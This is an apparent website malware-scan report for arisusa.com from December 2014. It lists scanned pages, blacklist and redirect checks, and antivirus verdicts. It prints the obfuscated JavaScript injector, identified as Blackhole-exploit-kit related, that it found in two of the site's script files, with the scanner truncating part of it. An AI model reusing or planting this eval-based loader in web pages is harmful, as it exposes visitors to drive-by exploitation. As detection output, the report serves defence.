New scan:

Malware Scanner report for arisusa.com

Malicious/Suspicious/Total urls checked
2/0/11
2 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://arisusa.com/
200 OK
Content-Length: 4149
Content-Type: text/html
clean
http://arisusa.com/index.html
200 OK
Content-Length: 4149
Content-Type: text/html
clean
http://arisusa.com/about-us.html
200 OK
Content-Length: 3326
Content-Type: text/html
clean
http://arisusa.com/services.html
200 OK
Content-Length: 3077
Content-Type: text/html
clean
http://arisusa.com/about-us
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 19:57:55 GMT
Accept-Ranges: bytes
Server: Apache
Vary: negotiate
Content-Length: 3326
Content-Location: about-us.html
Content-Type: text/html
TCN: choice
clean
http://arisusa.com/test404page.js
404 Not Found
Content-Length: 392
Content-Type: text/html
clean
http://arisusa.com/portfolio.html
200 OK
Content-Length: 2444
Content-Type: text/html
clean
http://arisusa.com/js/engine/jquery.js
200 OK
Content-Length: 80979
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

try{window.document.body++}catch(gdsgsdg){dbshre=22;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,95,111,97,25,55,27,91,103,92,111,104,92,102,109,40,94,105,93,90,110,96,60,100,94,103,96,101,108,33,33,100,93,106,90,103,96,30,33,52,7,5,4,2,25,26,27,23,92,113,99,41,106,106,92,26,56,23,31,97,110,111,103,50,40,41,92,105,91,97,99,114,8
... 849 bytes are skipped ...
,25,26,27,23,92,104,93,112,100,93,103,110,41,110,106,98,110,96,31,31,53,94,100,109,24,98,94,56,83,31,93,114,100,83,31,55,54,42,91,97,111,56,34,32,51,6,4,27,23,24,25,26,27,23,24,93,105,94,108,101,94,104,111,37,95,94,110,64,99,93,102,95,105,107,58,114,67,95,31,31,93,114,100,30,33,39,91,107,103,93,103,94,62,95,97,101,94,35,91,112,98,35,54,4,2,25,26,27,23,117,6,4,120,32,32,34,53);s="";for(i=0;i-474!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}

Antivirus reports:

AntiVir
JS/iFrame.afu.12
Avast
JS:Iframe-XJ [Trj]
Ikarus
Exploit.JS.Blacole
nProtect
JS:Trojan.JS.Agent.GO
K7AntiVirus
Riskware
Comodo
TrojWare.JS.BlacoleRef.W
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.400
Kaspersky
Trojan.JS.Redirector.xb
Microsoft
Exploit:JS/Blacole.KH
MicroWorld-eScan
JS:Trojan.JS.Agent.GO
Fortinet
JS/Iframe.W!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Agent.bdetht
F-Secure
JS:Trojan.JS.Agent.GO
F-Prot
JS/Blacole.DC.gen
AVG
HTML/Framer
Norman
Agent.AMAYB
GData
JS:Trojan.JS.Agent.GO
Commtouch
JS/Blacole.DC.gen
BitDefender
JS:Trojan.JS.Agent.GO

http://arisusa.com/js/engine/script.js
200 OK
Content-Length: 9400
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

try{window.document.body++}catch(gdsgsdg){dbshre=22;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,95,111,97,25,55,27,91,103,92,111,104,92,102,109,40,94,105,93,90,110,96,60,100,94,103,96,101,108,33,33,100,93,106,90,103,96,30,33,52,7,5,4,2,25,26,27,23,92,113,99,41,106,106,92,26,56,23,31,97,110,111,103,50,40,41,92,105,91,97,99,114,8
... 849 bytes are skipped ...
,25,26,27,23,92,104,93,112,100,93,103,110,41,110,106,98,110,96,31,31,53,94,100,109,24,98,94,56,83,31,93,114,100,83,31,55,54,42,91,97,111,56,34,32,51,6,4,27,23,24,25,26,27,23,24,93,105,94,108,101,94,104,111,37,95,94,110,64,99,93,102,95,105,107,58,114,67,95,31,31,93,114,100,30,33,39,91,107,103,93,103,94,62,95,97,101,94,35,91,112,98,35,54,4,2,25,26,27,23,117,6,4,120,32,32,34,53);s="";for(i=0;i-474!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}

Antivirus reports:

AntiVir
JS/iFrame.afu.12
Avast
JS:Iframe-XJ [Trj]
Ikarus
Exploit.JS.Blacole
nProtect
JS:Trojan.JS.Agent.GO
K7AntiVirus
Riskware
Comodo
TrojWare.JS.BlacoleRef.W
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.400
Kaspersky
Trojan.JS.Redirector.xb
Microsoft
Exploit:JS/Blacole.KH
MicroWorld-eScan
JS:Trojan.JS.Agent.GO
Fortinet
JS/Iframe.W!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Agent.bdetht
F-Secure
JS:Trojan.JS.Agent.GO
F-Prot
JS/Blacole.DC.gen
AVG
HTML/Framer
Norman
Agent.AMAYB
GData
JS:Trojan.JS.Agent.GO
Commtouch
JS/Blacole.DC.gen
BitDefender
JS:Trojan.JS.Agent.GO

http://arisusa.com/contact-us.html
200 OK
Content-Length: 3486
Content-Type: text/html
clean
http://arisusa.com/contact-us
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 19:57:59 GMT
Accept-Ranges: bytes
Server: Apache
Vary: negotiate
Content-Length: 3486
Content-Location: contact-us.html
Content-Type: text/html
TCN: choice
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: arisusa.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 19:57:51 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 4149
Content-Type: text/html

...4149 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: arisusa.com
Referer: http://www.google.com/search?q=arisusa.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=arisusa.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://arisusa.com/

Result: arisusa.com is not infected or malware details are not published yet.